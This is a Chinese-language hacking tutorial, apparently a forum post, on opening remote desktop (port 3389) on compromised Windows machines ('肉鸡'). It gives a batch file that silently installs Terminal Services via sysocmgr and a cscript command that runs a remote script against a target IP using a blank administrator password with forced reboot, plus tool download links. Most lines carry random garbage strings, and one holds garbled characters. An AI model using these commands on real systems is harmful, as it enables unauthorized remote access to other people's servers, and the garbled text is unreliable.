[hide=60] 1.打开记事本,编辑内容如下:
"h`oT4j5q echo [Components] > c:\sql
'#eY4d<i]n echo TSEnable = on >> c:\sql
B?gFFU61 sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
rgw@ 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
EGMIw?%Y`- $o%:ST4 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
%
|^V) 地址:
www.netsill.com/rots.zip pf8M0,AY 使用方法:
(ebC80M 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
`EdZ q).["fSV c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
FGey%:p9$ <y2HzBC 服务端口: 设置终端服务的服务端口。默认是3389。
+5i~}Q! 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
q@=3`yQ 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
e0:[,aF` 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
mDdL7I 运行CMD(2000下的DOS),我们给它开终端!
LX8A@Yct 命令如下!
259R5X<V cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
+ktubJ@Qgj 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
IzI2w6a 4Q17vCC*n 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
Y
a/+|mv 因为pro版不能安装终端服务。
dMw}4c3E 如果你确信脚本判断错误,就继续安装好了。
Liv.i;-qE !)4'[5t"U 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
IQ\5!e $n=w 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
OpD%lRl P
y!$r <8iu :nR 3,下载3389自动安装程序-djshao正式版5.0
fNk0&M 地址
www.netsill.com/djshao.zip wLa8&E